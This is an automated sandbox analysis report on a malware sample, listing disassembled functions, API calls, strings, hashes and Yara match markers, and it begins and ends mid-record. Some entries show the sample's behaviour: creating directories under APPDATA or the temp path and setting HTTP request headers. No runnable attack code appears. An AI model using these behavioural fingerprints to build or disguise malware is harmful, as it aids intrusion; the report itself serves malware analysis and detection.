                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57209
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5721B
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5722D
                                                                                  • Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5723F
                                                                                • _free.LIBCMT ref: 04B57483
                                                                                  • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                                                  • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                                                • _free.LIBCMT ref: 04B574A5
                                                                                • _free.LIBCMT ref: 04B574BA
                                                                                • _free.LIBCMT ref: 04B574C5
                                                                                • _free.LIBCMT ref: 04B574E7
                                                                                • _free.LIBCMT ref: 04B574FA
                                                                                • _free.LIBCMT ref: 04B57508
                                                                                • _free.LIBCMT ref: 04B57513
                                                                                • _free.LIBCMT ref: 04B5754B
                                                                                • _free.LIBCMT ref: 04B57552
                                                                                • _free.LIBCMT ref: 04B5756F
                                                                                • _free.LIBCMT ref: 04B57587
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                                                • Instruction ID: 14cb6ab2ab1a9437f4c82fe233bb491e545522ac7e1cbfa12bd6e5481a9237c1
                                                                                • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                                                • Instruction Fuzzy Hash: 95316B31B00605AFEB25AE3DE844B5AF7E8EF00354F50489AE869D71B0DF74F8409B20
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 00417227
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                                                                  • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                                                                • _free.LIBCMT ref: 0041721C
                                                                                  • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                                  • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                                • _free.LIBCMT ref: 0041723E
                                                                                • _free.LIBCMT ref: 00417253
                                                                                • _free.LIBCMT ref: 0041725E
                                                                                • _free.LIBCMT ref: 00417280
                                                                                • _free.LIBCMT ref: 00417293
                                                                                • _free.LIBCMT ref: 004172A1
                                                                                • _free.LIBCMT ref: 004172AC
                                                                                • _free.LIBCMT ref: 004172E4
                                                                                • _free.LIBCMT ref: 004172EB
                                                                                • _free.LIBCMT ref: 00417308
                                                                                • _free.LIBCMT ref: 00417320
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                                                • Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
                                                                                • Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                                                • Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628
                                                                                APIs
                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 04CFA5D8
                                                                                • type_info::operator==.LIBVCRUNTIME ref: 04CFA5FA
                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 04CFA709
                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 04CFA7DB
                                                                                • _UnwindNestedFrames.LIBCMT ref: 04CFA85F
                                                                                • CallUnexpected.LIBVCRUNTIME ref: 04CFA87A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 2123188842-393685449
                                                                                • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                                • Instruction ID: 1d886f11738a973bc4963baa765cc618aaf29c975ace3e3ce197e2408c4094cc
                                                                                • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                                • Instruction Fuzzy Hash: 33B1AD71800209DFDF59DF94CC809AEFBB6BF04314B11805AEA196B211D37AFA11DF91
                                                                                APIs
                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B43F
                                                                                • type_info::operator==.LIBVCRUNTIME ref: 04B4B461
                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 04B4B570
                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B642
                                                                                • _UnwindNestedFrames.LIBCMT ref: 04B4B6C6
                                                                                • CallUnexpected.LIBVCRUNTIME ref: 04B4B6E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 2123188842-393685449
                                                                                • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                                • Instruction ID: f958f8c1c06dd8ad2a3a2dda83ddbe627588a88ea3576b8e757bd005fb919053
                                                                                • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                                • Instruction Fuzzy Hash: 45B16C71C04209EFDF15DFA8C8809AEB7B5FF88314B14459AEA156B211D730FA51EFA1
                                                                                APIs
                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                                                                • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                                                                • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                                                                • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 2123188842-393685449
                                                                                • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                                • Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
                                                                                • Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                                                • Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA
                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                                                • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                                                • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                                                • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                                                • String ID: APPDATA$TMPDIR
                                                                                • API String ID: 1838500112-4048745339
                                                                                • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                                                • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                                                • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                                                • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                                                • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                                                Strings
                                                                                • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                                                • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                                                • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                                                • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: HeadersHttpRequest$H_prolog3_
                                                                                • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                • API String ID: 1254599795-787135837
                                                                                • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                                                • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                                                • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                                                • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                                                • Instruction ID: dd69b49a0ef58960c3fe2e0ca1513683c19ea7e9878b580f0b6b2268387d8ef6
                                                                                • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                                                • Instruction Fuzzy Hash: C621AD76A00108BFDB42EF94D840EDD7BB5FF08244F00856AF615AB161DB31E645CB90
                                                                                APIs
                                                                                • _free.LIBCMT ref: 04B51362
                                                                                  • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                                                  • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                                                • _free.LIBCMT ref: 04B5136E
                                                                                • _free.LIBCMT ref: 04B51379
                                                                                • _free.LIBCMT ref: 04B51384
                                                                                • _free.LIBCMT ref: 04B5138F
                                                                                • _free.LIBCMT ref: 04B5139A
                                                                                • _free.LIBCMT ref: 04B513A5
                                                                                • _free.LIBCMT ref: 04B513B0
                                                                                • _free.LIBCMT ref: 04B513BB
                                                                                • _free.LIBCMT ref: 04B513C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                                                • Instruction ID: 2a10a7805f43cdd66fb67693c0c57ce734796f275dd78e4ecda33884c6c57685
                                                                                • Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
                                                                                • Instruction Fuzzy Hash: A821B87A90011CFFDB05EF99D880EDDBFB8BF08244B4051A6E9259B171DB31EA54DB80
                                                                                APIs
                                                                                • _free.LIBCMT ref: 004110FB
                                                                                  • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                                  • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                                • _free.LIBCMT ref: 00411107
                                                                                • _free.LIBCMT ref: 00411112
                                                                                • _free.LIBCMT ref: 0041111D
                                                                                • _free.LIBCMT ref: 00411128
                                                                                • _free.LIBCMT ref: 00411133
                                                                                • _free.LIBCMT ref: 0041113E
                                                                                • _free.LIBCMT ref: 00411149
                                                                                • _free.LIBCMT ref: 00411154
                                                                                • _free.LIBCMT ref: 00411162
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                                                • Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
                                                                                • Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
                                                                                • Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84
                                                                                APIs
                                                                                • RtlDecodePointer.NTDLL(?), ref: 0041A622
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: DecodePointer
                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                • API String ID: 3527080286-3064271455
                                                                                • Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                                                • Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
                                                                                • Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
                                                                                • Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E
                                                                                APIs
                                                                                • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                                                • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                                                • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 2751267872-393685449
                                                                                • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                                                • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                                                • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                                                • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                                                APIs
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,04B492CD), ref: 04B492FB
                                                                                • GetModuleHandleW.KERNEL32(0041DFB8,?,?,04B492CD), ref: 04B49306
                                                                                • GetModuleHandleW.KERNEL32(0041DFFC,?,?,04B492CD), ref: 04B49317
                                                                                • GetProcAddress.KERNEL32(00000000,0041E018), ref: 04B49329
                                                                                • GetProcAddress.KERNEL32(00000000,0041E034), ref: 04B49337
                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B492CD), ref: 04B4935A
                                                                                • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 04B49376
                                                                                • CloseHandle.KERNEL32(0042AF60,?,?,04B492CD), ref: 04B49386
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                • String ID:
                                                                                • API String ID: 2565136772-0
                                                                                • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                                • Instruction ID: 096d5d5beab73883d0c31ded6276062fec5c07aa1a4af502f75caaa1d3304148
                                                                                • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                                                • Instruction Fuzzy Hash: 0B01B5F1F40321ABD7202F74AD09B9B3BA8EBCDB11B594071FD05D21A4DBACD4019A6A
                                                                                APIs
                                                                                • __RTC_Initialize.LIBCMT ref: 1000291D
                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                • String ID:
                                                                                • API String ID: 2442719207-0
                                                                                • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                                                • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                                                • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                                                • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                                                • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                                                • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                                                • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 04CFA017
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 04CFA01F
                                                                                • _ValidateLocalCookies.LIBCMT ref: 04CFA0A8
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 04CFA0D3
                                                                                • _ValidateLocalCookies.LIBCMT ref: 04CFA128
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                                • Instruction ID: 02ed3da176320049f94a72230680090ba0795208dd5a9570a4d9163b30b2759e
                                                                                • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                                • Instruction Fuzzy Hash: 4B41E534A00208EFDF50DF68DC84A9EBBB6EF45318F148055EE199B391D73ABA15CB91
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 0040AC17
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
                                                                                • _ValidateLocalCookies.LIBCMT ref: 0040ACA8
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
                                                                                • _ValidateLocalCookies.LIBCMT ref: 0040AD28
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                                • Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
                                                                                • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                                • Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
